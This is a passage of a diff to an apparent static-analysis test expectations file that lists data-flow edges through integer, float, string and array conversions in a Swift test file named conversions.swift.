conversions.swift:42:20:42:20 | arr | -| conversions.swift:41:12:41:12 | arr | conversions.swift:41:12:41:17 | ...[...] | -| conversions.swift:41:12:41:12 | arr | conversions.swift:42:20:42:20 | arr | -| conversions.swift:42:20:42:20 | arr | conversions.swift:43:20:43:20 | arr | -| conversions.swift:43:12:43:23 | call to Array.init(_:) | conversions.swift:43:12:43:26 | ...[...] | -| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | -| conversions.swift:45:12:45:48 | call to Array.init(_:) | conversions.swift:45:12:45:51 | ...[...] | -| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | -| conversions.swift:47:5:47:9 | let ...? | conversions.swift:47:9:47:9 | v | -| conversions.swift:47:9:47:9 | SSA def(v) | conversions.swift:48:13:48:13 | v | -| conversions.swift:47:9:47:9 | v | conversions.swift:47:9:47:9 | SSA def(v) | -| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:47:5:47:9 | let ...? | -| conversions.swift:51:6:51:6 | SSA def(v2) | conversions.swift:52:12:52:12 | v2 | -| conversions.swift:51:6:51:6 | v2 | conversions.swift:51:6:51:6 | SSA def(v2) | -| conversions.swift:51:6:51:10 | ... as ... | conversions.swift:51:6:51:6 | v2 | -| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:51:6:51:10 | ... as ... | -| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | -| conversions.swift:54:6:54:6 | SSA def(v4) | conversions.swift:55:12:55:12 | v4 | -| conversions.swift:54:6:54:6 | v4 | conversions.swift:54:6:54:6 | SSA def(v4) | -| conversions.swift:54:6:54:10 | ... as ... | conversions.swift:54:6:54:6 | v4 | -| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:54:6:54:10 | ... as ... | -| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | -| conversions.swift:57:6:57:6 | SSA def(v5) | conversions.swift:58:12:58:12 | v5 | -| conversions.swift:57:6:57:6 | v5 | conversions.swift:57:6:57:6 | SSA def(v5) | -| conversions.swift:57:11:57:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | -| conversions.swift:60:6:60:6 | SSA def(v6) | conversions.swift:61:12:61:12 | v6 | -| conversions.swift:60:6:60:6 | v6 | conversions.swift:60:6:60:6 | SSA def(v6) | -| conversions.swift:60:11:60:48 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | -| conversions.swift:63:6:63:6 | SSA def(v7) | conversions.swift:64:12:64:12 | v7 | -| conversions.swift:63:6:63:6 | v7 | conversions.swift:63:6:63:6 | SSA def(v7) | -| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | -| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | -| conversions.swift:66:6:66:6 | SSA def(v8) | conversions.swift:67:12:67:12 | v8 | -| conversions.swift:66:6:66:6 | v8 | conversions.swift:66:6:66:6 | SSA def(v8) | -| conversions.swift:66:18:66:18 | 0 | conversions.swift:66:6:66:6 | v8 | -| conversions.swift:67:12:67:12 | [post] v8 | conversions.swift:68:12:68:12 | v8 | -| conversions.swift:67:12:67:12 | v8 | conversions.swift:68:12:68:12 | v8 | -| conversions.swift:68:12:68:12 | [post] v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:68:12:68:12 | v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:71:12:71:45 | call to Self.init(exactly:) | conversions.swift:71:12:71:46 | ...! | -| conversions.swift:72:12:72:48 | call to Self.init(exactly:) | conversions.swift:72:12:72:49 | ...! | -| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) | conversions.swift:75:12:75:51 | ...! | -| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | -| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | -| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | -| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | -| conversions.swift:82:7:82:7 | SSA def(q1) | conversions.swift:83:12:83:12 | q1 | -| conversions.swift:82:7:82:7 | q1 | conversions.swift:82:7:82:7 | SSA def(q1) | -| conversions.swift:82:11:82:11 | SSA def(r1) | conversions.swift:84:12:84:12 | r1 | -| conversions.swift:82:11:82:11 | r1 | conversions.swift:82:11:82:11 | SSA def(r1) | -| conversions.swift:82:17:82:56 | call to quotientAndRemainder(dividingBy:) | conversions.swift:82:6:82:13 | (...) | -| conversions.swift:86:7:86:7 | SSA def(q2) | conversions.swift:87:12:87:12 | q2 | -| conversions.swift:86:7:86:7 | q2 | conversions.swift:86:7:86:7 | SSA def(q2) | -| conversions.swift:86:11:86:11 | SSA def(r2) | conversions.swift:88:12:88:12 | r2 | -| conversions.swift:86:11:86:11 | r2 | conversions.swift:86:11:86:11 | SSA def(r2) | -| conversions.swift:86:17:86:72 | call to quotientAndRemainder(dividingBy:) | conversions.swift:86:6:86:13 | (...) | -| conversions.swift:90:7:90:7 | SSA def(q3) | conversions.swift:91:12:91:12 | q3 | -| conversions.swift:90:7:90:7 | q3 | conversions.swift:90:7:90:7 | SSA def(q3) | -| conversions.swift:90:11:90:11 | SSA def(r3) | conversions.swift:92:12:92:12 | r3 | -| conversions.swift:90:11:90:11 | r3 | conversions.swift:90:11:90:11 | SSA def(r3) | -| conversions.swift:90:17:90:75 | call to quotientAndRemainder(dividingBy:) | conversions.swift:90:6:90:13 | (...) | -| conversions.swift:94:6:94:6 | SSA def(pair1) | conversions.swift:95:12:95:12 | pair1 | -| conversions.swift:94:6:94:6 | pair1 | conversions.swift:94:6:94:6 | SSA def(pair1) | -| conversions.swift:94:14:94:44 | call to addingReportingOverflow(_:) | conversions.swift:94:6:94:6 | pair1 | -| conversions.swift:95:12:95:12 | [post] pair1 | conversions.swift:96:12:96:12 | pair1 | -| conversions.swift:95:12:95:12 | pair1 | conversions.swift:96:12:96:12 | pair1 | -| conversions.swift:98:6:98:6 | SSA def(pair2) | conversions.swift:99:12:99:12 | pair2 | -| conversions.swift:98:6:98:6 | pair2 | conversions.swift:98:6:98:6 | SSA def(pair2) | -| conversions.swift:98:14:98:60 | call to addingReportingOverflow(_:) | conversions.swift:98:6:98:6 | pair2 | -| conversions.swift:99:12:99:12 | [post] pair2 | conversions.swift:100:12:100:12 | pair2 | -| conversions.swift:99:12:99:12 | pair2 | conversions.swift:100:12:100:12 | pair2 | -| conversions.swift:102:6:102:6 | SSA def(pair3) | conversions.swift:103:12:103:12 | pair3 | -| conversions.swift:102:6:102:6 | pair3 | conversions.swift:102:6:102:6 | SSA def(pair3) | -| conversions.swift:102:14:102:63 | call to addingReportingOverflow(_:) | conversions.swift:102:6:102:6 | pair3 | -| conversions.swift:103:12:103:12 | [post] pair3 | conversions.swift:104:12:104:12 | pair3 | -| conversions.swift:103:12:103:12 | pair3 | conversions.swift:104:12:104:12 | pair3 | -| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | -| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | -| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | -| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | -| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | -| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | -| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | -| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | -| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | -| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) | -| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | -| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:76:119:76 | 0.0 | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:41:120:41 | 0 | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:121:63:121:63 | 0.0 | conversions.swift:121:12:121:66 | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | -| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | -| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | -| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | -| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | -| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | -| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | -| conversions.swift:138:6:138:6 | SSA def(ms1) | conversions.swift:139:12:139:12 | ms1 | -| conversions.swift:138:6:138:6 | ms1 | conversions.swift:138:6:138:6 | SSA def(ms1) | -| conversions.swift:138:12:138:26 | call to MyString.init(_:) | conversions.swift:138:12:138:27 | ...! | -| conversions.swift:138:12:138:27 | ...! | conversions.swift:138:6:138:6 | ms1 | -| conversions.swift:138:21:138:21 | abc | conversions.swift:138:12:138:26 | call to MyString.init(_:) | -| conversions.swift:139:12:139:12 | [post] ms1 | conversions.swift:140:12:140:12 | ms1 | -| conversions.swift:139:12:139:12 | ms1 | conversions.swift:140:12:140:12 | ms1 | -| conversions.swift:140:12:140:12 | [post] ms1 | conversions.swift:141:12:141:12 | ms1 | -| conversions.swift:140:12:140:12 | ms1 | conversions.swift:140:12:140:16 | .description | -| conversions.swift:140:12:140:12 | ms1 | conversions.swift:141:12:141:12 | ms1 | -| conversions.swift:141:12:141:12 | [post] ms1 | conversions.swift:142:12:142:12 | ms1 | -| conversions.swift:141:12:141:12 | ms1 | conversions.swift:141:12:141:16 | .debugDescription | -| conversions.swift:141:12:141:12 | ms1 | conversions.swift:142:12:142:12 | ms1 | -| conversions.swift:144:6:144:6 | SSA def(ms2) | conversions.swift:145:12:145:12 | ms2 | -| conversions.swift:144:6:144:6 | ms2 | conversions.swift:144:6:144:6 | SSA def(ms2) | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:46 | ...! | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:144:6:144:6 | ms2 | -| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | -| conversions.swift:145:12:145:12 | [post] ms2 | conversions.swift:146:12:146:12 | ms2 | -| conversions.swift:145:12:145:12 | ms2 | conversions.swift:146:12:146:12 | ms2 | -| conversions.swift:146:12:146:12 | [post] ms2 | conversions.swift:147:12:147:12 | ms2 | -| conversions.swift:146:12:146:12 | ms2 | conversions.swift:146:12:146:16 | .description | -| conversions.swift:146:12:146:12 | ms2 | conversions.swift:147:12:147:12 | ms2 | -| conversions.swift:147:12:147:12 | [post] ms2 | conversions.swift:148:12:148:12 | ms2 | -| conversions.swift:147:12:147:12 | ms2 | conversions.swift:147:12:147:16 | .debugDescription | -| conversions.swift:147:12:147:12 | ms2 | conversions.swift:148:12:148:12 | ms2 | -| conversions.swift:152:6:152:6 | SSA def(parent) | conversions.swift:153:12:153:12 | parent | -| conversions.swift:152:6:152:6 | parent | conversions.swift:152:6:152:6 | SSA def(parent) | -| conversions.swift:152:6:152:15 | ... as ... | conversions.swift:152:6:152:6 | parent | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:152:6:152:15 | ... as ... | -| conversions.swift:153:12:153:12 | [post] parent | conversions.swift:154:12:154:12 | parent | -| conversions.swift:153:12:153:12 | parent | conversions.swift:154:12:154:12 | parent | -| conversions.swift:154:12:154:12 | [post] parent | conversions.swift:156:40:156:40 | parent | -| conversions.swift:154:12:154:12 | parent | conversions.swift:156:40:156:40 | parent | -| conversions.swift:156:6:156:6 | SSA def(v3) | conversions.swift:157:12:157:12 | v3 | -| conversions.swift:156:6:156:6 | v3 | conversions.swift:156:6:156:6 | SSA def(v3) | -| conversions.swift:156:6:156:10 | ... as ... | conversions.swift:156:6:156:6 | v3 | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:156:6:156:10 | ... as ... | -| conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | -| conversions.swift:157:12:157:12 | [post] v3 | conversions.swift:158:12:158:12 | v3 | -| conversions.swift:157:12:157:12 | v3 | conversions.swift:158:12:158:12 | v3 | -| conversions.swift:169:7:169:7 | SSA def(self) | conversions.swift:169:7:169:7 | self[return] | -| conversions.swift:169:7:169:7 | self | conversions.swift:169:7:169:7 | SSA def(self) | -| conversions.swift:170:2:170:2 | SSA def(self) | conversions.swift:170:2:191:2 | self[return] | -| conversions.swift:170:2:170:2 | self | conversions.swift:170:2:170:2 | SSA def(self) | -| conversions.swift:171:7:171:7 | SSA def(arr1) | conversions.swift:173:13:173:13 | arr1 | -| conversions.swift:171:7:171:7 | arr1 | conversions.swift:171:7:171:7 | SSA def(arr1) | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:171:7:171:7 | arr1 | -| conversions.swift:172:7:172:7 | SSA def(arr2) | conversions.swift:174:13:174:13 | arr2 | -| conversions.swift:172:7:172:7 | arr2 | conversions.swift:172:7:172:7 | SSA def(arr2) | -| conversions.swift:172:14:172:33 | [...] | conversions.swift:172:7:172:7 | arr2 | -| conversions.swift:173:13:173:13 | arr1 | conversions.swift:175:13:175:13 | arr1 | -| conversions.swift:174:13:174:13 | arr2 | conversions.swift:176:13:176:13 | arr2 | -| conversions.swift:175:13:175:13 | [post] arr1 | conversions.swift:178:25:178:25 | arr1 | -| conversions.swift:175:13:175:13 | arr1 | conversions.swift:175:13:175:19 | ...[...] | -| conversions.swift:175:13:175:13 | arr1 | conversions.swift:178:25:178:25 | arr1 | -| conversions.swift:176:13:176:13 | [post] arr2 | conversions.swift:179:25:179:25 | arr2 | -| conversions.swift:176:13:176:13 | arr2 | conversions.swift:176:13:176:19 | ...[...] | -| conversions.swift:176:13:176:13 | arr2 | conversions.swift:179:25:179:25 | arr2 | -| conversions.swift:178:7:178:7 | SSA def(arr1b) | conversions.swift:180:13:180:13 | arr1b | -| conversions.swift:178:7:178:7 | arr1b | conversions.swift:178:7:178:7 | SSA def(arr1b) | -| conversions.swift:178:15:178:29 | try ... | conversions.swift:178:7:178:7 | arr1b | -| conversions.swift:178:19:178:29 | call to Array.init(_:) | conversions.swift:178:15:178:29 | try ... | -| conversions.swift:178:25:178:25 | arr1 | conversions.swift:185:31:185:31 | arr1 | -| conversions.swift:179:7:179:7 | SSA def(arr2b) | conversions.swift:181:13:181:13 | arr2b | -| conversions.swift:179:7:179:7 | arr2b | conversions.swift:179:7:179:7 | SSA def(arr2b) | -| conversions.swift:179:15:179:29 | try ... | conversions.swift:179:7:179:7 | arr2b | -| conversions.swift:179:19:179:29 | call to Array.init(_:) | conversions.swift:179:15:179:29 | try ... | -| conversions.swift:179:25:179:25 | arr2 | conversions.swift:186:31:186:31 | arr2 | -| conversions.swift:180:13:180:13 | arr1b | conversions.swift:182:13:182:13 | arr1b | -| conversions.swift:181:13:181:13 | arr2b | conversions.swift:183:13:183:13 | arr2b | -| conversions.swift:182:13:182:13 | arr1b | conversions.swift:182:13:182:20 | ...[...] | -| conversions.swift:183:13:183:13 | arr2b | conversions.swift:183:13:183:20 | ...[...] | -| conversions.swift:185:7:185:7 | SSA def(arr1c) | conversions.swift:187:13:187:13 | arr1c | -| conversions.swift:185:7:185:7 | arr1c | conversions.swift:185:7:185:7 | SSA def(arr1c) | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) | conversions.swift:185:7:185:7 | arr1c | -| conversions.swift:186:7:186:7 | SSA def(arr2c) | conversions.swift:188:13:188:13 | arr2c | -| conversions.swift:186:7:186:7 | arr2c | conversions.swift:186:7:186:7 | SSA def(arr2c) | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) | conversions.swift:186:7:186:7 | arr2c | -| conversions.swift:187:13:187:13 | [post] arr1c | conversions.swift:189:13:189:13 | arr1c | -| conversions.swift:187:13:187:13 | arr1c | conversions.swift:189:13:189:13 | arr1c | -| conversions.swift:188:13:188:13 | [post] arr2c | conversions.swift:190:13:190:13 | arr2c | -| conversions.swift:188:13:188:13 | arr2c | conversions.swift:190:13:190:13 | arr2c | -| conversions.swift:189:13:189:13 | arr1c | conversions.swift:189:13:189:20 | ...[...] | -| conversions.swift:190:13:190:13 | arr2c | conversions.swift:190:13:190:20 | ...[...] | -| conversions.swift:196:7:196:7 | SSA def(self) | conversions.swift:196:7:196:7 | self[return] | -| conversions.swift:196:7:196:7 | self | conversions.swift:196:7:196:7 | SSA def(self) | -| conversions.swift:197:6:197:6 | self | conversions.swift:197:6:197:6 | SSA def(self) | -| conversions.swift:197:6:197:6 | self | conversions.swift:197:6:197:6 | SSA def(self) | -| conversions.swift:197:6:197:6 | self | conversions.swift:197:6:197:6 | SSA def(self) | -| conversions.swift:197:6:197:6 | value | conversions.swift:197:6:197:6 | SSA def(value) | -| conversions.swift:199:2:199:2 | SSA def(self) | conversions.swift:200:3:200:3 | self | -| conversions.swift:199:2:199:2 | self | conversions.swift:199:2:199:2 | SSA def(self) | -| conversions.swift:199:7:199:12 | SSA def(v) | conversions.swift:200:12:200:12 | v | -| conversions.swift:199:7:199:12 | v | conversions.swift:199:7:199:12 | SSA def(v) | -| conversions.swift:200:3:200:3 | [post] self | conversions.swift:199:2:201:2 | self[return] | -| conversions.swift:200:3:200:3 | self | conversions.swift:199:2:201:2 | self[return] | -| conversions.swift:205:7:205:17 | SSA def(withUInt) | conversions.swift:206:13:206:13 | withUInt | -| conversions.swift:205:7:205:17 | withUInt | conversions.swift:205:7:205:17 | SSA def(withUInt) | -| conversions.swift:206:13:206:13 | [post] withUInt | conversions.swift:207:14:207:14 | withUInt | -| conversions.swift:206:13:206:13 | withUInt | conversions.swift:207:14:207:14 | withUInt | -| conversions.swift:207:3:207:22 | SSA def(self) | conversions.swift:208:12:208:12 | self | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:207:3:207:22 | SSA def(self) | -| conversions.swift:208:12:208:12 | [post] self | conversions.swift:205:2:209:2 | self[return] | -| conversions.swift:208:12:208:12 | self | conversions.swift:205:2:209:2 | self[return] | -| conversions.swift:211:7:211:20 | SSA def(withMyValue) | conversions.swift:212:13:212:13 | withMyValue | -| conversions.swift:211:7:211:20 | withMyValue | conversions.swift:211:7:211:20 | SSA def(withMyValue) | -| conversions.swift:212:13:212:13 | [post] withMyValue | conversions.swift:213:10:213:10 | withMyValue | -| conversions.swift:212:13:212:13 | withMyValue | conversions.swift:213:10:213:10 | withMyValue | -| conversions.swift:213:3:213:22 | SSA def(self) | conversions.swift:214:12:214:12 | self | -| conversions.swift:214:12:214:12 | [post] self | conversions.swift:211:2:215:2 | self[return] | -| conversions.swift:214:12:214:12 | self | conversions.swift:211:2:215:2 | self[return] | -| conversions.swift:217:7:217:21 | SSA def(withMyValue2) | conversions.swift:218:13:218:13 | withMyValue2 | -| conversions.swift:217:7:217:21 | withMyValue2 | conversions.swift:217:7:217:21 | SSA def(withMyValue2) | -| conversions.swift:218:13:218:13 | [post] withMyValue2 | conversions.swift:219:11:219:11 | withMyValue2 | -| conversions.swift:218:13:218:13 | withMyValue2 | conversions.swift:219:11:219:11 | withMyValue2 | -| conversions.swift:219:7:219:7 | SSA def(x) | conversions.swift:220:10:220:10 | x | -| conversions.swift:219:7:219:7 | x | conversions.swift:219:7:219:7 | SSA def(x) | -| conversions.swift:219:11:219:24 | .v | conversions.swift:219:7:219:7 | x | -| conversions.swift:220:3:220:10 | SSA def(self) | conversions.swift:221:12:221:12 | self | -| conversions.swift:220:10:220:10 | x | conversions.swift:220:3:220:10 | SSA def(self) | -| conversions.swift:221:12:221:12 | [post] self | conversions.swift:217:2:222:2 | self[return] | -| conversions.swift:221:12:221:12 | self | conversions.swift:217:2:222:2 | self[return] | -| conversions.swift:224:14:224:14 | SSA def(self) | conversions.swift:224:2:227:2 | self[return] | -| conversions.swift:224:14:224:14 | self | conversions.swift:224:14:224:14 | SSA def(self) | -| conversions.swift:224:20:224:33 | SSA def(withMyValue) | conversions.swift:225:13:225:13 | withMyValue | -| conversions.swift:224:20:224:33 | withMyValue | conversions.swift:224:20:224:33 | SSA def(withMyValue) | -| conversions.swift:225:13:225:13 | [post] withMyValue | conversions.swift:226:10:226:10 | withMyValue | -| conversions.swift:225:13:225:13 | withMyValue | conversions.swift:226:10:226:10 | withMyValue | +| conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | +| conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | +| conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | +| conversions.swift:48:12:48:40 | call to String.init(_:) | conversions.swift:48:12:48:42 | .utf8 | +| conversions.swift:48:19:48:39 | call to sourceInt(_:) | conversions.swift:48:12:48:40 | call to String.init(_:) | +| conversions.swift:50:6:50:6 | SSA def(arr) | conversions.swift:51:12:51:12 | arr | +| conversions.swift:50:6:50:6 | arr | conversions.swift:50:6:50:6 | SSA def(arr) | +| conversions.swift:50:12:50:39 | [...] | conversions.swift:50:6:50:6 | arr | +| conversions.swift:51:12:51:12 | arr | conversions.swift:52:12:52:12 | arr | +| conversions.swift:52:12:52:12 | [post] arr | conversions.swift:53:20:53:20 | arr | +| conversions.swift:52:12:52:12 | arr | conversions.swift:52:12:52:17 | ...[...] | +| conversions.swift:52:12:52:12 | arr | conversions.swift:53:20:53:20 | arr | +| conversions.swift:53:20:53:20 | arr | conversions.swift:54:20:54:20 | arr | +| conversions.swift:54:12:54:23 | call to Array.init(_:) | conversions.swift:54:12:54:26 | ...[...] | +| conversions.swift:55:20:55:42 | call to sourceString(_:) | conversions.swift:55:20:55:44 | .utf8 | +| conversions.swift:56:12:56:48 | call to Array.init(_:) | conversions.swift:56:12:56:51 | ...[...] | +| conversions.swift:56:20:56:42 | call to sourceString(_:) | conversions.swift:56:20:56:44 | .utf8 | +| conversions.swift:58:5:58:9 | let ...? | conversions.swift:58:9:58:9 | v | +| conversions.swift:58:9:58:9 | SSA def(v) | conversions.swift:59:13:59:13 | v | +| conversions.swift:58:9:58:9 | v | conversions.swift:58:9:58:9 | SSA def(v) | +| conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:58:5:58:9 | let ...? | +| conversions.swift:62:6:62:6 | SSA def(v2) | conversions.swift:63:12:63:12 | v2 | +| conversions.swift:62:6:62:6 | v2 | conversions.swift:62:6:62:6 | SSA def(v2) | +| conversions.swift:62:6:62:10 | ... as ... | conversions.swift:62:6:62:6 | v2 | +| conversions.swift:62:18:62:50 | call to numericCast(_:) | conversions.swift:62:6:62:10 | ... as ... | +| conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:62:18:62:50 | call to numericCast(_:) | +| conversions.swift:65:6:65:6 | SSA def(v4) | conversions.swift:66:12:66:12 | v4 | +| conversions.swift:65:6:65:6 | v4 | conversions.swift:65:6:65:6 | SSA def(v4) | +| conversions.swift:65:6:65:10 | ... as ... | conversions.swift:65:6:65:6 | v4 | +| conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | conversions.swift:65:6:65:10 | ... as ... | +| conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | +| conversions.swift:68:6:68:6 | SSA def(v5) | conversions.swift:69:12:69:12 | v5 | +| conversions.swift:68:6:68:6 | v5 | conversions.swift:68:6:68:6 | SSA def(v5) | +| conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:68:6:68:6 | v5 | +| conversions.swift:71:6:71:6 | SSA def(v6) | conversions.swift:72:12:72:12 | v6 | +| conversions.swift:71:6:71:6 | v6 | conversions.swift:71:6:71:6 | SSA def(v6) | +| conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | conversions.swift:71:6:71:6 | v6 | +| conversions.swift:74:6:74:6 | SSA def(v7) | conversions.swift:75:12:75:12 | v7 | +| conversions.swift:74:6:74:6 | v7 | conversions.swift:74:6:74:6 | SSA def(v7) | +| conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:74:6:74:6 | v7 | +| conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:74:11:74:35 | call to abs(_:) | +| conversions.swift:77:6:77:6 | SSA def(v8) | conversions.swift:78:12:78:12 | v8 | +| conversions.swift:77:6:77:6 | v8 | conversions.swift:77:6:77:6 | SSA def(v8) | +| conversions.swift:77:18:77:18 | 0 | conversions.swift:77:6:77:6 | v8 | +| conversions.swift:78:12:78:12 | [post] v8 | conversions.swift:79:12:79:12 | v8 | +| conversions.swift:78:12:78:12 | v8 | conversions.swift:79:12:79:12 | v8 | +| conversions.swift:79:12:79:12 | [post] v8 | conversions.swift:80:12:80:12 | v8 | +| conversions.swift:79:12:79:12 | v8 | conversions.swift:80:12:80:12 | v8 | +| conversions.swift:80:12:80:12 | [post] v8 | conversions.swift:81:12:81:12 | v8 | +| conversions.swift:80:12:80:12 | v8 | conversions.swift:81:12:81:12 | v8 | +| conversions.swift:81:12:81:12 | [post] v8 | conversions.swift:82:12:82:12 | v8 | +| conversions.swift:81:12:81:12 | v8 | conversions.swift:82:12:82:12 | v8 | +| conversions.swift:84:12:84:45 | call to Self.init(exactly:) | conversions.swift:84:12:84:46 | ...! | +| conversions.swift:85:12:85:48 | call to Self.init(exactly:) | conversions.swift:85:12:85:49 | ...! | +| conversions.swift:90:12:90:50 | call to Self.init(_:radix:) | conversions.swift:90:12:90:51 | ...! | +| conversions.swift:91:12:91:53 | call to Self.init(_:radix:) | conversions.swift:91:12:91:54 | ...! | +| conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | +| conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | +| conversions.swift:95:27:95:46 | call to sourceInt(_:) | conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | +| conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | +| conversions.swift:97:12:97:31 | call to sourceInt(_:) | conversions.swift:97:12:97:33 | .littleEndian | +| conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | conversions.swift:98:12:98:36 | .littleEndian | +| conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | +| conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | +| conversions.swift:102:7:102:7 | SSA def(q1) | conversions.swift:103:12:103:12 | q1 | +| conversions.swift:102:7:102:7 | q1 | conversions.swift:102:7:102:7 | SSA def(q1) | +| conversions.swift:102:11:102:11 | SSA def(r1) | conversions.swift:104:12:104:12 | r1 | +| conversions.swift:102:11:102:11 | r1 | conversions.swift:102:11:102:11 | SSA def(r1) | +| conversions.swift:102:17:102:56 | call to quotientAndRemainder(dividingBy:) | conversions.swift:102:6:102:13 | (...) | +| conversions.swift:106:7:106:7 | SSA def(q2) | conversions.swift:107:12:107:12 | q2 | +| conversions.swift:106:7:106:7 | q2 | conversions.swift:106:7:106:7 | SSA def(q2) | +| conversions.swift:106:11:106:11 | SSA def(r2) | conversions.swift:108:12:108:12 | r2 | +| conversions.swift:106:11:106:11 | r2 | conversions.swift:106:11:106:11 | SSA def(r2) | +| conversions.swift:106:17:106:72 | call to quotientAndRemainder(dividingBy:) | conversions.swift:106:6:106:13 | (...) | +| conversions.swift:110:7:110:7 | SSA def(q3) | conversions.swift:111:12:111:12 | q3 | +| conversions.swift:110:7:110:7 | q3 | conversions.swift:110:7:110:7 | SSA def(q3) | +| conversions.swift:110:11:110:11 | SSA def(r3) | conversions.swift:112:12:112:12 | r3 | +| conversions.swift:110:11:110:11 | r3 | conversions.swift:110:11:110:11 | SSA def(r3) | +| conversions.swift:110:17:110:75 | call to quotientAndRemainder(dividingBy:) | conversions.swift:110:6:110:13 | (...) | +| conversions.swift:114:7:114:7 | SSA def(q4) | conversions.swift:115:12:115:12 | q4 | +| conversions.swift:114:7:114:7 | q4 | 